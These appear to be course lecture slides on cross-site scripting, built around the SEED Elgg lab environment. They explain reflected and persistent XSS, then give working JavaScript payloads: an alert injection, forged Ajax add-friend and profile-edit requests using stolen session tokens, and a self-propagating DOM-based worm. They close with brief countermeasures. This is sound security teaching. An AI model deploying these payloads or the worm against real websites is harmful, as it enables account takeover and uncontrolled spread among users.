## <center> Cross-Site Scripting Attack </center>

- Code injection attack

- Second most prevalent issue in the Top Ten web security risks by the Open Web Application Security Project (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_2017_Project)

<center> <img src="figure/xss/xss1.png" width="600"/>

- Codes coming from the website are considered trusted and will be executed within the protected sandbox of the browser. 
- If the victim has an active session with the website, the code can do whatever the user can do inside the session. 

#### Two types of XSS attack
- Persistent XSS
- Non-persistent XSS

#### Non-persistent (reflected) XSS attack

<center> <img src="figure/xss/xss2.png" width="600"/>

#### Examples
- Go to Google and search for "cross-site scriping attack"
- How the search query is reflected back inside the web page?

When a reflect website does not sanitize user inputs, it may have an XSS vulnerability:

- Javascript codes can be put into the input so that the codes can be reflected back in the page displayed in the browser of the victim. 

#### Persistent XSS Attack
<center> <img src="figure/xss/xss3.png" width="600"/>

#### Potential damage from XSS
- Web defacing via DOM API modification
- Spoofing requests
- Stealing information

#### XSS Attacks in Action

- Use SEED Virtual Machine
- www.XSSLabElgg.com
- /var/www/XSS/elgg

- admin/seedelgg
- alice/seedalice
- boby/seedboby
- charlie/seedcharlie
- samy/seedsamy

#### Injecting Javascript Code

- Place the following code inside the **Brief Description** field of Samy's profile:

```
<script> alert("XSS"); </script>
```

- What happens when someone else visits Samy's profile?

#### Use XSS Attacks to Befriend with Others

- Examine Page Source to identify add-friend request string and security token parameters
- In Javascript code, we will use Ajax to send out HTTP requests in background

Enter the followings into Samy's **About me** field (must switch to Edit HTML mode):

```
<script type="text/javascript">
window.onload = function(){
// Set the timestamp and secret token parameters 
var Ajax = null;
var ts    = "&__elgg_ts="+elgg.security.token.__elgg_ts;      
var token = "&__elgg_token="+elgg.security.token.__elgg_token; 

// Construct the URL (Samy's GUID is 47)
var sendurl="http://www.xsslabelgg.com/action/friends/add"     
             + "?friend=47" + token + ts;                      

// Create and send the Ajax request
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
                      "application/x-www-form-urlencoded");
Ajax.send();
}
</script>
```

#### Use XSS Attacks to modify profiles

```
<script type="text/javascript">
window.onload = function(){
// Access user name and guid
var name = "&name=" + elgg.session.user.name;
var guid = "&guid=" + elgg.session.user.guid;

// Access timestamp and security token
var ts    = "&__elgg_ts="+elgg.security.token.__elgg_ts;
var token = "&__elgg_token="+elgg.security.token.__elgg_token;

// Set the content and access leve for the description field
var desc = "&description=SAMY+is+MY+HERO";
desc += "&accesslevel%5Bdescription%5d=2";

// Set the URL
var sendurl="http://www.xsslabelgg.com/action/profile/edit";

// Construct and send the Ajax request
if(elgg.session.user.guid != 47)     
{
   //Create and send Ajax request to modify profile
   var Ajax=new XMLHttpRequest();
   Ajax.open("POST", sendurl, true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type",
                         "application/x-www-form-urlencoded");

   // Send the POST request with the data
   Ajax.send(token + ts + name + desc + guid);
}
}
</script>
```

#### Achieving self-propagation

<center> <img src="figure/xss/xss4.png" width="600"/>

#### DOM Approach

- Add an identifier to the Javascript so that it is stored and accessible via the page's DOM (Document Object Model). 
- Include with the script a self-calling function that adds script's content from DOM to the victim's profile. 

```
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\"worm\" type=\"text/javascript\">";  
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";                                  

// Put all the pieces together, and apply the URI encoding 
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);  
// Access user name and guid
var name = "&name=" + elgg.session.user.name;
var guid = "&guid=" + elgg.session.user.guid;

// Access timestamp and security token
var ts    = "&__elgg_ts="+elgg.security.token.__elgg_ts;
var token = "&__elgg_token="+elgg.security.token.__elgg_token;

// Set the content and access leve for the description field
var desc = "&description=SAMY+is+MY+HERO" + wormCode;
desc += "&accesslevel%5Bdescription%5d=2";

// Set the URL
var sendurl="http://www.xsslabelgg.com/action/profile/edit";

// Construct and send the Ajax request
if(elgg.session.user.guid != 47)     
{
   //Create and send Ajax request to modify profile
   var Ajax=new XMLHttpRequest();
   Ajax.open("POST", sendurl, true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type",
                         "application/x-www-form-urlencoded");

   // Send the POST request with the data
   Ajax.send(token + ts + name + desc + guid);
}
}
</script>
```

### Countermeasures:

- Filter all Javascript codes (difficult to implement)
- Replace HTML markups with alternate representation, encoding and decoding syntax (<, >, ...)